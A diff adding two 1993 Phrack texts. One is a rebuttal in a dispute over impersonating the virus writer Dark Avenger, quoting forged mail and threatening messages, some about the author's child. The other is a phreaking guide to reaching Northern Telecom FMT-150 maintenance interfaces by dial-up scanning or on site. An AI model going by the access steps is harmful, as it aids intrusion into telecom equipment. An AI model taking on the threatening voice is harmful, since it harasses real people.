+        id AA12850; Thu, 15 Jul 93 02:04:46 +0300
+Message-Id: <9307142304.AA12850@XXXXXXXXXXXX>
+To: XXXXXXX
+From: dav@danbo.digsys.bg
+Date: Wed, 14 Jul 93 23:41:36 +0300
+Subject: No subject
+Status: RO
+
+
+kohntark-
+
+i just talked to a friend of mine who said you dont like her user
+log. why shouldnt i call her from bulgaria? i call whoever i want
+to, and this is not your problem.
+
+by the way, she sent me your mail. for your information, i do
+know how much money she made of that interview. and i also think
+that this is none of your business.
+
+also, maybe it would be good for you to know, that by offending
+her, you are offending me, too. keep this in mind.
+
+<dav>
+
+Second Message:
+-------------------------------------------------------------------------
+
+
+>My mail with her is none of your business either.
+
+i dont think so, dude.
+
+
+maybe you need to read the next few lines again,
+in case you missed them.
+
+
+>>
+>> also, maybe it would be good for you to know, that by offending
+>> her, you are offending me, too. keep this in mind.
+>>
+>> <dav>
+ >
+ >HA HA! and you expect me to believe that you are the DA!
+ >send me a proof: an email address from bulgaria or tell me
+ >how many addressing modes does the MTE have?
+ >
+ >nice try.
+
+
+ well, what do you think the domain .bg in my email address stands for?
+ maybe you think its kameroon?
+ as for the mte, im not giving you any info.
+
+ i need not prove anything to anybody, and certainly dont plan to waste more
+ of my time talking to you. you have been warned.
+
+
+<dav>
+
+Third Message:
+-------------------------------------------------------------------------
+
+ oh, yeah. sure it did.
+ only you will not know where something else came from, when it knocks on your
+ door. i have nothing more to say.
+
+-------------------------------------------------------------------------
+
+
+
+
+Odd. He did not include the mail he forged using the address I gave him
+in good faith to WIRED magazine.
+
+He also did not include the mail he forged to Anthony Naggs,
+an engineer, in which he made the following statements:
+
+
+
+> > From @gate.demon.co.uk,@anon.penet.fi:darkavenger@sofia.somewhere.bg Fri
+    Sep 17 18:16:32 1993
+> > Received: from post.demon.co.uk by ubik.demon.co.uk with SMTP
+> >       id AA4544 ; Fri, 17 Sep 93 18:16:22 GMT
+> > Received: from post.demon.co.uk via puntmail for amn@ubik.demon.co.uk;
+> >           Fri Sep 17 14:49:12 BST 1993
+> > Received: from gate.demon.co.uk by post.demon.co.uk id gk03845;
+> >           17 Sep 93 14:09 BST
+> > Received: from anon.penet.fi by gate.demon.co.uk id aa01230;
+> >           17 Sep 93 6:07 GMT-60:00
+> > Received: from cxxxxx.ic.xxxxxx.edu by anon.penet.fi (5.67/1.35)
+
+
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^see originating mail location?
+
+> >       id AA15730; Fri, 17 Sep 93 07:58:28 +0300
+> > From: DarkAvenger@sofia.somewhere.bg
+> > Message-Id: <9309170458.AA15730@anon.penet.fi>
+> > Return-Path: <DarkAvenger@sofia.somewhere.bg>
+> > Date: Thursday, 16 Sept 93 22:02:54
+> > To: amn@ubik.demon.co.uk
+> > MMDF-Warning:  Parse error in original version of preceding line at gate.
+    demon.co.uk
+> > Subject: NO i am NOT
+> > Status: RO
+>
+> NO , I have not found "more interesting thigs to do"!
+> If you don't know it yet, I am still active and will release
+> work at the end of the year.
+> Also in case you don't know the VNI interview was mostly made up.
+> I haven't talked to Sara in almost a year, and I will never again.
+> She betrayed me.
+> She will deny this and try to exploit my name more.
+> Until the end of year.
+>
+> Then again.. what do you know? you are like the weasel: another
+> stupid engineer.. you know nothing about viruses!
+>
+> UNtil then..
+>
+>
+>
+>
+
+-------
+
+Dark Avenger spells my name with an "h" :) And, he doesn't mail people
+from cxxxxx.ic.xxxxxx.edu :) And, I think this pretty clearly illustrates the
+motivations and methods of Kohntark.
+
+         In my ignorance, I blindly trusted the three cryptic replies
+         to be true, even thought whoever replied refused to give out
+         trivial information such as the number of addressing modes
+         for a 2 year old encryption engine (MTE) and spelled Cameroon
+         with a 'k' (Check out Sara Gordon's spelling of URUGUAY in
+         VIRUS-L Volume 6 Issue 120 -v06i120)
+
+         Shortly after other unrelated discussions and a CUD post from
+         Sara(h) in which I was mentioned (unnamed), someone warned me
+         of several posts in NUKENET by an alleged dark avenger and
+         Todor Todorov from an account belonging to the last,
+         mentioning me and Aristotle.
+
+Sheesh. Kameroon with a -K- is the German spelling. It is also the most
+common spelling a European would use. The "correct" spelling, for anyone
+who cares, is Cameroun, because it is mainly a French speaking colony; A
+small portion of it is English-speaking and uses Cameroon. Most likely,
+An American would use Cameroon. Consult your nearest linguist or historical
+specialist for verification. Talk to discman about my linguistic aptitude.
+Do not attempt this at home.
+
+Kohntark spelled SKISM incorrectly in one of his messages to me. He must be the
+Dark Avenger. No, wait..he onlys -wants- to be...
+
+Those messages in the NukeNet were prompted by the virus exchange sysop
+mentioned earlier asking Todor Todorov to contact Dark Avenger and ask
+him if he had really talked to me. Todor -is- a friend of mine. He
+assisted me in my study of virus exchange bbs and their impact on end
+users. Todor put the mail on some Bulgarian BBS, and Dark Avenger
+answered it. Apparently, his answer was not liked very well by this
+Aristotle and others people, because an amateur linguistic analysis followed,
+detailing how much like me the Dark Avenger appeared to be.
+
+I employed the services of a professional linguist, who stated that
+indeed there are striking similarities. This can be attributed to the
+fact that Dark Avenger and I have spent many hours together.
+And, I usually type in lower case, in E-Mail messages, etc. Come to
+think of it, most of the hackers I know must be the Dark Avenger if
+this is the qualification :)
+
+         In those messages I was referred to as 'hotshot,' a word that
+         Sara Gordon had used on me several times on our personal
+         email exchange; It was then that I became highly suspicious
+         of the whole matter.
+
+Yes, I used this word. I use it all the time. So does Dark Avenger. It
+is a word we use to refer to certain people. It is a commonly used word
+in Bulgaria. It is not so common here, but it is there. They watch a lot
+of American television, and use a lot of words like this as well as a
+lot of profanity. Movies. Motherfucker and Asshole are two other words
+used a lot by Bulgarian hackers and virus writers. In fact, the word
+"motherfucker", which "proved" it was NOT a Bulgarian that posted as
+<dav> :) in the NuKeNet (since, as they said, NO Bulgarian would EVER
+use -this- word), was found in a virus of Bulgarian origin a very long
+time ago. Perhaps they should learn to disassemble the damned things
+before trying to say what's in them. In defense of NuKe (and believe me,
+there has been no love lost between some of those people and myself in
+the past), I think a lot of people were baited and led on by certain people.
+
+         I called Virginia's Virus Research Institute's sysop and
+         owner, Aristotle to find out more about the posts and he
+         bought to my attention the particular writing style of
+         Sara(h) Gordon: She NEVER uses capital letters and
+         apostrophes on her personal email, and always signs her name
+         on the lower left hand corner. (She seldom signs her posts
+
+Virginia Virus Research Institute is (was) The Black Axis BBS. The place
+that sold viruses for one hundred dollars per collection. Pretty
+enterprising, eh? Only, a lot of them were junk. The sysop is the same
+one who told me he was going to get the Dark Avenger to come forth, to
+'Save my Name' or something like that. He also told me that if a new
+virus appeared, bearing the name 'Dark Avenger', people would want to
+'catch' the virus writer again. And, guess what? Such a virus did
+appear. A crude hack of the Burma virus, with a text string included:
+DARKAVENGER :). And, it was this very sysop that uploaded it to a
+certain well known virus exchange BBS. Slick, huh? But definitely not the
+work of Dark Avenger.
+
+However, this will not make me identify the Dark Avenger, assuming I did
+know the path to his door.
+
+This same sysop also told me (when he closed his system) that he had
+intentionally tried to incite people, and had made some mistakes along
+the way in doing this. We all make mistakes. Unfortunately, Kohntark is
+making a really big mistake here.
+
+Yes, I use lower case ALL THE TIME. And, like Dark Avenger, I sometimes
+do and sometimes do not use correct punctuation. Apparently Kohntark has
+not been around in the early days of <dav> postings on Fidonet. Oh,
+that's right. He does not read it. Well, if he had, he would have seen
+Dark Avenger had this 'style' a long time before I ever heard of
+computer viruses.
+
+I am using upper case in this article (mostly) because when I write for
+a readership (as opposed to private mail, and online chats, etc.), I use
+correct form. Well, as correct form as I can.
+
+         nowadays and changes her user name in her vfr@netcom.com
+         account every week!; for further proof of her writing style,
+         please refer to public posts in VIRUS-L Volume 6 #120; I also
+         have over 100K of personal email exchange to prove this
+         fact!)
+
+Shame on me. I change my user name :) I am so El33t....
+I'm too hexy for my shirt, too hexy for my shirt...blah blah
+
+         It was then that we realized that she was passing herself as
+         Todor Todorov and the dark avenger (who could possibly verify
+         their online identity?) and had infiltrated NUKENET..
+
+HAHAHAHAHAHAAHHAAHHA oops, excuse me..hahahahahaha
+
+This is ridiculous, as anyone who has checked will know. Todorov is happy to
+take calls from people about this matter; eminent
+publicly (not anonymous) figures in the field know that I wrote
+the truth, and there really is nothing further to be said about this
+nonsense.
+
+         The writing style described corresponds exactly to the one on
+         the posts I received from the 'dark avenger.'
+         Shortly afterward the <dav@danbo.digsys.bg> account was
+         cancelled and I learned the whole truth:
+
+Oh my. My writing style corresponds exactly to Dark Avengers. It
+certainly does, when I want it to, or when I have been writing to him a
+lot. And, it does when I write e-mail. So what? So does the style of a
+of people :) We are all Dark Avenger. If you counted the names of
+everyone who writes in lower case, makes spelling areas, and signs their
+mail in the lower left hand corner of messages, how many people do you
+think you would find?
+
+About the account: Yes, it was cancelled. After Kohntark forged mail from
+that site, prompting a response from WIRED, I asked the system administrator
+to cancel the account so that no more such trickery could take place,
+requiring me to spend time trying to straighten it out. He
+was happy to do it. He had more than a few problems with Dark
+Avenger ftping files in excess, and had only retained the account as a
+personal favor to me. <dav> (yes, that IS how he signs personal mail,
+e-mail and some of his viruses) did not exactly be a nice boy on that
+system.
+
+         The danbo.digsys.bg Bulgarian site belongs to Daniel Kalchev,
+         another self appointed AV researcher whose best claims to
+         fame are submitting various Bulgarian viruses to Patricia
+         Hoffman's VSUM!!
+
+Self-appointed? He is the administrator of the Internet there. I think
+Kohntark is not fully aware of just who Mr. Kalchev is.
+
+         (You can check this by doing a search on 'Kalchev' on the
+         current VSUMs or you can contact him thru:
+         <daniel@danbo.sigsys.bg> )
+
+No. The best address is daniel@digsys.bg. Mr. and Mrs. Kalchev both have
+accounts there, and you can reach them best if you use this address.
+And please do feel free to contact him. He will tell you that he has
+talked to Dark Avenger for a very long time. Long before digsys was on
+the internet, and long before I met either of them.
+
+         He is a very close friend of Sara(h) Gordon and he has an
+         account in her VFR BBS (you can check this by logging into
+         her system and checking the user list) and SHE has an
+         account in digsys.bg under <sarah@danbo.digsys.bg> (this
+         account is still valid as far as I know; notice the H after
+         her name!)
+
+Of course he is a very close friend of mine. He has visited me here, and
+has been a great help to me in my work. Yes, I do have an account there.
+It has been there since I was invited by the Bulgarian ACM to present my
+work on Computer Viruses at their International Computer Virus
+Conference. It was nice of Daniel to do this for me, to make it
+convenient for me to access my mail, as I could have it forwarded there.
+
+We never did remove the account, as Bulgarian's prefer to mail in their
+own country for some reason. The H after my name is very simple: My name
+is Sarah Gordon. On the nets, I use Sara. When I am friends with
+someone, I use my given name. I do not like my given "familiar" name to
+be used in my articles or in e-mail from people I don't know. It is a
+quirk, I guess. My papers are presented using the Sara variant :)
+
+         What I concluded is that is the DA would never get an account
+         in such system as he HATES Daniel Kalchev!!!!
+
+Another wrong conclusion.
+
+The DA might not, but then the District Attorney usually doesn't :)
+
+Wrong. and Right. He certainly did get an account there. Call Daniel
+Kalchev or mail him to ask him. He has had many conversations with Dark
+Avenger there. He does sure hate Daniel. In this one thing, Kohntark is
+correct. He hates him violently. And, he's been on his BBS for years.
+Where do you think he used to post messages FROM?
+
+I tried repeatedly to act as intermediary between Dark Avenger and
+Kalchev, because they both have been very good to me. There was just no
+way to do it. Dark Avenger thinks Kalchev is (in his own words) "asshole
+hotshot with big company and lots of money, he can afford to give free
+accounts...". And yes, he used the word HOTSHOT. JUST LIKE ME.
+
+         This is what really happened: Sara(h) Gordon in her
+         desperation to prove that she was in touch with the dark
+         avenger, told her pal Daniel Kalchev to make an account under
+         the dark avenger's name (<dav> this is how she always refers
+         to him, even though he never signs his name that way (check
+         the source code for his 'Dark Avenger' virus or the
+         'Commander Bomber' virus message name: [DAME])
+
+No one has the source code for Commander Bomber that I know of except
+myself and Dark Avenger, as I previously noted. He has signed his name
+this way for a very long time, in his e-mail. You can verify this easily
+enough by asking Todor, Daniel, Bontchev, or anyone who used to read his
+old posts. Sometimes he does, sometimes he doesn't, just like me.
+
+         From there she could email me messages that would come from
+         Bulgaria and would be untraceable since she would log into
+         her account in digsys.bg and log into the <dav> account
+         internally from the same site in Bulgaria. (You can check
+         where and when most of the people log from in most internet
+         unix and vax sites)
+
+:). If I wanted to mail Kohntark untraceable messages, I would not have
+to go to this extreme, as you well know :)
+
+         As it is expected from her, she has denied any of this.
+         Some of her ridiculous explanations include things like
+         "hotshot is a very common English word in Bulgaria" !!!
+
+         You might ask yourself what is the deal with the h? is it
+         sara or sarah??
+
+         Well, I asked her the same question when I noticed this in
+         one of the VNI interviews, where her name is spelled as
+         Sarah.
+
+         She replied that this was a mistake of the publisher.
+
+         Mistake? well not really, it was another lie, meant to throw
+         off any information and truth seekers, for example you can
+         check her account in Daniel Kalchev's system:
+
+I explained this previously. It was a mistake. VNI is not supposed to
+use my given entire familiar name. In fact, they did mess up. They did
+not use it in the Dark Avenger interview, despite I had put it there as
+"Sarah". I told Dark Avenger I would do this for him. He asked me to do
+it, but for some reason they did not. Later, they -did- use my given
+name in a totally different situation. I can't account for their errors.
+
+         <saraH@danbo.digsys.bg> , spelled with an H,
+         another 'mistake of the publisher?'
+         :)
+
+         Other countless Sara Gordon lies are told in NUKE Info-
+         Journal # 6.
+
+In the last NuKe Journal, the authors posted some private mail of mine,
+and said "Look how nice she knows this public mail will be read"..at the
+same time, the posted some public mail, from my BBS, which I had
+forwarded to one of them as a reply, and said "Look how nasty she is
+when she thinks no one can see". All in all, their response to both
+letters prompted a lot of people to think I had -joined- NuKe. For the
+record, nope.
+
+         This behavior puts in question the validity of the VNI
+         interviews and the reputation of Sara(h) Gordon as a serious
+         (self appointed) 'virus researcher'
+
+:)
+
+         IMHO the VNI interviews are a complete fabrication, meant
+         only to boost her validity as a 'journalist', and to make her
+         lots of money, charging for further 'interviews' to other
+         magazines. (She has offered her paid 'interviewing' services
+         to various other publications.)
+
+:) Lots of money? Well, first off, I told you how the Dark Avenger
+interview profited me. It didn't. Secondly, yes, I do write for
+magazines and I sell the articles. Some, I give away. I don't do any of
+this for the money. As for other interviewing, I recently interviewed
+two virus writers (one who has stopped, one who has not), and they are
+quite pleased with the articles. I'll ask them to contact you personally
+to tell you as the article is not yet in print. Keep in mind, I have
+literally no control over commentary by editors, omissions, etc.
+
+
+         To the best of my knowledge the information I present here
+         is true and can be checked.
+
+Yes, it can be checked, and I hope you check it and print what you find
+along with this commentary.
+
+         I chose to publish this information, despite threats against
+         my well being and countless lies about me propagated by
+         Sara(h) Gordon.
+
+Now, about threats and lies. Here is the sort of mail I have received
+from Kohntark. In the interest of space, I will send you the headers,
+etc., so that you can see them and include here only the sort of
+diatribe he has been so vehemently sending me.
+
+I contacted his system administrator after this continued for such
+a long time. I'm not a Cori. I don't take every "hey, wanna have phone
+sex" message as a potential threat, I don't call people's probation
+officers for the hell of it, I don't ring up sysadmins at the drop of a
+hat to accuse innocent people of causing trouble. And, I discussed this
+situation with a lot of people, hackers and virus writers, friends and
+foes, prior to taking this action. There's no way to know over the nets if
+someone is really a maniac or if they are just playing around. In this case,
+considering the nature of the mail, I did contact them.
+
+First, the apology after he had gotten particularly nasty.
+
+
+Organization: Anonymous contact service
+Reply-To: xxxxxx@anon.penet.fi
+Subject: Apology
+Date: Fri, 30 Jul 93 8:08:45 EDT
+Status: OR
+
+Sara:
+
+I want to apologize for everything that I have said that you might
+have found offensive.
+
+I drop all accusations I have made against you.
+again, I am sorry.
+I have no desire in creating any animosity, and / or bad publicity
+to my name or yours.
+
+Sorry things got this silly and out of hand.
+
+Please accept my apologies and let's drop the whole thing OK?
+
+Thank you.
+
+------------
+
+Followed almost immediately by a forgery. What Kohntark did not realize
+is that I am in contact with Simon. In fact, I arranged for him to come
+to a virus conference, with all of his expenses paid. I am writing an
+article for 40-HEX, and I immediately called Simon to ask what in the hell was
+this about. After he told me, I went back and checked the mail headers.
+Guess what I found?
+
+From simon@skism.login.qc.ca Sat Jul 31 07:44:26 1993
+Received: from anon.penet.fi by mail.netcom.com (5.65/SMI-4.1/Netcom)
+        id AA17333; Sat, 31 Jul 93 07:44:19 -0700
+Received: from cxxxxx.ic.xxxxxx.edu by anon.penet.fi (5.67/1.35)
+              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+        id AA21213; Sat, 31 Jul 93 17:40:54 +0300
+
+From: simon@skism.login.qc.ca
+Message-Id: <9307311440.AA21213@anon.penet.fi>
+Return-Path: <simon@sklism.login.ca>
+
+****Notice: He misspelled skism. Maybe -he- is the Dark Avenger.
+I mean, if spelling counts..***
+
+Date: Fri, 30 Jul 93 12:01:02 EST
+Subject: get real!
+Apparently-To: <vfr@netcom.com>
+Status: OR
+
+to vfr@netcom.com.... (Nobody)
+what is the matter? everyone knows you are sara gordon, are you afraid
+to sign you own name now??
+
+            Yes sara gordon, i heard rumours that you are passing yourself
+            as the dark avenger. It wouldn't surprise me since you are
+            even afraid to sign your own postings.
+
+
+--------
+
+Ha. Actually he signed the above message at the bottom left:) He must be
+me in Real Life.... As we all have seen by now, if you sign the bottom
+left of your mail, you are Sara Gordon.
+
+Then, here he tells me how he has proved yet another self-appointed
+virus researcher wrong. Of course, the researcher in question is not
+wrong. He is Vesselin Bontchev, a rather pedantic but technically
+brilliant anti-virus Doctoral student at the University of Hamburg.
+Kohntark seems obsessed with proving anti-virus researchers wrong. It
+would make more sense to me to learn from the researchers. I am not
+talking about product developers or sales people, but researchers.
+
+ME=Sara
+HIM=Kohntark
+
+ME: dont you get it? im sorry, i am not going to respond to all of this
+    nonsense. maybe you can get vesselin to respond to you again, but
+    i  doubt it considering his opinion of your 'knowledge'...
+
+HIM: I don't give a damn about what he thinks, I have shown the self appointed
+     virus expert is wrong.That is all.
+
+---------
+
+and, here (i'm reverting to UNIX lower case now, i must be the dark
+avenger..), he begins his harassment again.
+
+HIM: you don't have any children do you?  It shows
+
+Then, after he tell me he knows all about me, he proceeds to mail me to
+taunt me with addresses referring to my child.
+
+From kohntark@youhavea10yearoldson.com Sun Aug 29 10:55:45 1993
+Return-Path: <kohntark@youhavea10yearoldson.com>
+Received: from [193.64.138.3] by mail.netcom.com (5.65/SMI-4.1/Netcom)
+        id AA07061; Sun, 29 Aug 93 10:55:39 -0700
+Received: from cxxxxx.ic.xxxxxx.edu by anon.penet.fi (5.67/1.35)
+        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+        id AA22796; Sun, 29 Aug 93 20:50:35 +0300
+
+
+ME: am tired of your threats. the only danger you are to me
+    is to waste my time with this nonsense.
+
+HIM: we will see.
+
+HIM:  Never underestimate the power of hate.
+
+HIM:   The end is coming.
+
+HIM:  Also: you said 'oh my name is spelled SARA, VNI misspelled it!
+yeah right ! you idiot!
+you forgot who you are dealing here ha ha! not a fool like you!!!
+stupid tricks like changing your name can't defend you from thy mighty
+Kohntark!
+prepare yourself!!
+
+the end is near!
+
+
+Obviously i have overestimated your intelligence..
+My dog has a higher IQ..
+"who is anthony naggs?.." DUHH!
+Thanx for making my job easier he he.
+You think you got me? sure.. go ahead.. fry that guy's account, you will
+be doing me a favour he he!
+AH, and start looking for a new job.. you will need it soon after i am done
+with you
+you idiot!
+
+------
+
+He likes me to know he is watching me. Only, for a supreme UNIX hacker,
+he has not mastered the skills quite yet..note the paths again..
+(baby copperfield is one of the names i used. i have red hair, and its a
+long story; someone asked me if i had read dickens and i replied 'yes,
+I've read baby copperfield'. CHFN followed :)
+
+But this was a bit eerie mail. Love him?
+
+From babycopperfield@haha.com Sun Sep 12 17:39:50 1993
+Received: from anon.penet.fi by mail.netcom.com (5.65/SMI-4.1/Netcom)
+        id AA22703; Sun, 12 Sep 93 17:39:42 -0700
+Received: from cxxxxx.ic.xxxxxx.edu by anon.penet.fi (5.67/1.35)
+               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+        id AA24832; Mon, 13 Sep 93 03:39:00 +0300
+From: babycopperfield@haha.com
+Message-Id: <9309130039.AA24832@anon.penet.fi>
+Return-Path: <babycopperfield@haha.com>
+Date: Fri 13 Dec 66 00:00:00
+To: <vfr@netcom.com> (Sara)
+Subject: I know you are on...
+Status: OR
+
+hi!
+
+i know you are logged on now...
+shame we cannot talk,, you know friendly discussions ha ha..
+i might call to your bbs.. can i upload your gif picture??
+yes?
+
+if i like you you might just get lucky ...
+
+Love  me.
+
+------
+         More of his article..
+
+         I am doing this to stop the lies and corruption fostered by
+         the Anti-Virus industry.
+
+---------
+What do you think? Is he doing -this- to stop the lies and
+corruption? It seems to me that the anti-virus industry would benefit
+from the Dark Avenger coming back onto the scene. They could sell more
+software, get the whole hacking community attacked by people who are
+afraid enough already. Why we could get a whole entire Legion of Virus
+Fighters up in arms, eh?
+
+If Kohntark wanted to do this 'stopping of lies and corruption', he would
+not be helping to recreate the myth of the Dark Avenger. He would not be
+impersonating him, harassing me, and telling people (impersonating Dark Avenger)
+that he will still release viruses into the wild. I also do not like lies and
+corruption, and work very hard to stop it. I do not profit from it in any
+substantial way.
+
+I run a free BBS: I distribute anti-virus software for free, and
+encourage people to choose software that will work for them in their
+situation. I don't go for the big scare tactics used by some companies,
+and I don't recommend those products. Not only because I don't like
+their marketing, but because their products are not as
+efficient/accurate as other products. I don't like that we have to have
+these products, but we do. It's a fact of life. If we can educate people
+on the real situation with viruses, we can stop a lot of this "Let's get
+those bad virus writers" before it's too late. We don't need another
+Dark Avenger. We don't need laws that will infringe on our freedoms.
+
+If anyone takes this "Sara and the Dark Avenger scam" even half-way
+seriously, they can email me, and ask me whatever specific questions
+they like. I also have a suggestion here, one that might even lead to
+some sort of agreement between this Kohntark and the rest of the hacker
+community that does not support lies and harassment. You call Todorov,
+e-mail or call Bontchev. Ask them. I'll come to HoHoCon (if someone buys
+me a ticket; although Kohntark thinks I had better look for a job, the
+fact is I don't have a real job), and compile the bomber source code
+and MtE Source (not the pitiful disassemblies that appear on a lot of
+BBS, but the REAL source, supplied to me by <dav> when I questioned HIM
+to make sure he was the "Real Thing". I'll show you step by step how it
+compiles flawlessly and works. If after you confirm that to the best of
+your knowledge, what I am saying is true, then I think Kohntark owes me
+an apology. And, an apology to the rest of the virus writers and hackers
+who do not need or deserve to be portrayed as evil demented creatures
+who are waiting to "Destroy the World".
diff --git a/phrack44/13.txt b/phrack44/13.txt
new file mode 100644
index 0000000..998e7be
--- /dev/null
+++ b/phrack44/13.txt
@@ -0,0 +1,455 @@
+                              ==Phrack Magazine==
+
+                    Volume Four, Issue Forty-Four, File 13 of 27
+
+****************************************************************************
+
+                           METRO P/H Presents
+
+                           Northern Telecom's
+                              FMT-150B/C/D
+
+              Optical Fiber Digital Transmission System
+
+
+
+Intro
+
+
+This file will cover the FMT-150, the equipment that sends info over
+the digital trunks using lasers.  It is an accompaniment to our guide
+to remotes (COs).  I will cover all the interesting and useful stuff.
+This file is mostly for SERIOUS phreaks, we'll have more non-technical
+cool stuff coming up.
+
+
+
+System Description
+
+
+The FMT-150 fiber optic transmission system combines DM-13
+multiplexers and 150 Mb/s Fiber Transports in compact shelf
+packages, I will refer to it as a shelf.  The FMT-150 product
+architecture supports subscriber loop and interoffice link
+applications using hub, drop/insert, repeater and terminal
+configurations.  The following is what a FMT-150 shelf system
+consists of.
+
+
+
+      FMT-150B     1 DM-13 multiplexer (multiplexes 3 signals
+                     into one signal of 44.736 Mb/s.)
+                   1 150 Mb/s fiber interface
+                   1 maintenance control unit
+                   1 service channel unit (optional)
+                   2 (or 4) power supply units
+
+      FMT-150C     2 DM-13 multiplexers
+                   2 (or 4) power supply units
+
+      FMT-150D     2 150 Mb/s fiber interfaces
+                   2 service channel units (both optional)
+                   2 maintenance control units
+                   2 (or 4) power supply units
+
+
+
+Maintenance
+
+
+                    Service Channel Unit
+
+Order-wire Facility
+
+Two voice channels per DS-3 signal are provided for individual
+addressing using DIP switches on the SCU.  Dial over a 4 wire
+headset/handset.  (more in Order-Wire)
+
+Interfaces
+
+The CRT (good old Cathode Ray Tube) Interface is an important
+system feature of the Maintenance Control Unit (MCU).  You can
+plug in to a RS-232 port directly (use a null-modem cable) on the
+"shelf" or remotely via a modem (!).  Also a Tandy 200 can be
+interfaced with the Maintenance Control Unit.  The network
+configuration, the status of each node, and any alarm existing
+can be viewed on the terminal.  The interface goes from 300 to
+9600 baud.  The software already present on the MCU is all that
+is needed, the interface need only support certain emulations
+(see Operation Procedures.)  (hmmm... Could Radio Shack and
+Northern Telecom be butt buddies?)  Also available is a
+RS-422 interface which provides a large number of alarm status
+and control points through the MCU.  The port is labeled
+"Customer E2A" on the shelf.  CAMMS is an extended feature
+of the FMT-150.  It stands for Central Access Maintenance and
+Monitoring System which can also take advantage of the
+Maintenance features (see Operation Procedures).  All this is,
+is a mini-terminal, that can be installed and act like a CRT
+interface.
+
+
+Specifications
+
+When interfacing the CRT with a null modem cable, your cable
+should fit the diagram below.
+
+Ŀ                                        Ŀ
+1  OO 1 
+2  OO 3 
+3  OO 2 
+4  OO 8 
+5  O O 20
+6  O O 7 
+7  O         O 4 
+8  OO 5 
+20 OO 6 
+                                        
+
+                 Pin Definitions
+      1. Ground                 6. Data Set Ready
+      2. Transmit Data          7. Ground
+      3. Receive Data           8. Data Carrier Detect
+      4. Request to Send        9. Data Terminal Ready
+      5. Clear to Send
+
+
+
+When interfacing your Hayes compatible (telephone connection)
+configure the DIP switches in this manner.
+
+X=empty space                  O X O X X O X O
+O=the switch's position        X O X O O X O X
+                               1 2 3 4 5 6 7 8
+
+
+
+Alarms and Buttons
+
+
+Listed below are some LED descriptions and button meanings that a
+phreak will find on the shelf.
+
+LEDs                            Description
+-----------------------------------------------------------------
+
+MAJOR                           RED - Service affecting failure
+                                  (run, they'll be there soon!)
+MINOR                           YELLOW - Non-service affecting
+                                  failure.
+FUSE ALARM                      RED - A fuse blew
+REM                             YELLOW - An alarm has occurred at
+                                  a remote site.
+Order-wire Left                 GREEN - Solid, Left order wire is
+                                  active, if flashing, incoming
+                                  call on left.
+Order-wire Right                Same as above, but for Right
+
+-----------------------------------------------------------------
+
+BUTTONS                         Description
+_________________________________________________________________
+
+LP TEST                         Lights up all LEDs
+ACO                             Turns off existing audible alarm
+LOC 1, 2, 3 (OW)                Rings every site common to STX
+                                  signal 1, 2, and 3
+EXP 1, 2, 3 (OW)                Same as above
+-----------------------------------------------------------------
+
+Power Supply Unit
+
+This is a seemingly 5V output power supply, which has a simple
+ON/OFF switch which is housed under a protective latch, pull this
+and have an instant phreak marathon (see REDUNDANCY at end of
+file.)
+
+
+
+Equipment Configuration
+
+
+The FMT-150 system is suitable for a wide variety of
+applications, as follows:
+
+* Access Networks
+  CO to Customer Serving Areas
+  CO to Digital Loop Carrier
+  CO to Switch Remote
+  CO to Customer Premises.
+* Inter-Office Trunk routes
+* Broadband Applications such as Video
+* Entrance Links to Radio Systems
+* Dynamic Network Routing
+* Stand-Alone Multiplexer Applications with Radio
+* Route Diversity
+* Wide Area Network (WAN) Application
+
+
+Order-Wire
+
+
+                           Order Wire
+
+A buzzer is heard and a flashing LED is seen if a call is
+coming in, plug in a handset/headset connector into the jack on
+the shelf.  To terminate the call pull the plug out or hit #.  To
+dial, just plug in and dial four digits, wildcards are also
+allowed by use of the * key.   The handset described is a
+Contempra Handset (NT2E36AA).  A test set could also be used but
+the plug would have to be altered, its 4 wire, remember.  Order Wire
+is only CO-to-CO communication.  The jack can be plugged into the
+front of the FMT-150 shelf.  The dialing format is described below.
+
+
+-----------------------------------------------------------------
+First digit:             Indicates the type of call being made
+
+Second, Third, and       Indicated which site will be dialed.
+Fourth digits            Address of the site is set via rotary
+                         switches located on the front edge of
+                         the SCU module.
+-----------------------------------------------------------------
+
+
+First digit significance
+
+1 = local call for STX ({Pseudo} Synchronous Transport Signal:
+    First Level at 49.92 Mb/s [NT]) signal 2
+2 = local call for STX signal 2
+3 = local call for STX signal 3
+(where'd 4 go?)
+5 = express call for STX signal 1
+6 = express call for STX signal 2
+7 = express call for STX signal 3
+
+
+The three following digits are not standard, so if you want to
+experiment with this hit a first digit and then three *'s
+
+On the shelf there are buttons which act like speed dialing, the
+first three letters stand for LOCal or EXPress and the number is
+the signal, so EXP 2 would be broadcast call on STX signal 2,
+express channel.
+
+
+
+Installation
+
+                   A typical FMT-150 Setup
+ Ŀ
+             Ground Bar              
+ Ĵ
+          Fuse & Alarm Panel                                 A
+ Ĵ                        |
+            FMT-150 Shelf                                    |
+ Ĵ                       7ft
+            FMT-150 Shelf                                    |
+ Ĵ                        |
+ Fiber Splice/Storage Panel or CAMMS                         V
+ Ĵ      <----25.94in---->
+            FMT-150 Shelf            
+ Ĵ
+            FMT-150 Shelf            
+ Ĵ
+            FMT-150 Shelf            
+ Ĵ
+            FMT-150 Shelf            
+ Ĵ
+       FMT-150 or Rectifier Shelf    
+ Ĵ
+    FMT-150 or Standby Batt. Shelf   
+ Ĵ
+           AC outlet Assy            
+ 
+
+
+
+Operation Procedures
+
+
+Specifics on Interfacing
+
+The RS-232 serial interface supports the following terminals.
+
+* DEC VT 100
+* DEC VT 102
+* DEC VT 220
+* DEC VT 320
+* FALCO
+* IBM 3162 with VT 220 cartridge
+* Wyse WY85 with VT100 Emulation
+* Ramodom VT200 portable terminal
+* Televideo 922
+* Televideo 9220
+* Tandy 200 (only with Multipoint Plus MCU:NT7H90CA/XC)
+* CAMMS (only with Multipoint Plus: NT7H90CA/XC/FA)
+* Cybernex (in 8-bit mode only)
+
+
+(Ok bros this is the part we are interested in so sit back)
+
+Login Procedures
+
+
+If you approach the FMT-150 shelf and have a previously described
+interface, then you can login.  Also if you are scanning (GTE
+(Northern Telecom) areas only) and come across a "sitting system"
+that displays a message (below) after hitting 3 returns, you are in!
+
+                   1 - DEC VT100
+                   2 - NT Meridian 6000
+                       (Crosstalks or Procom with VT100
+                       emulation)
+                   3 - Tandy 200 (running Telecom)
+                   F4- NTCAMMS MDU
+                   Enter Terminal Type:
+
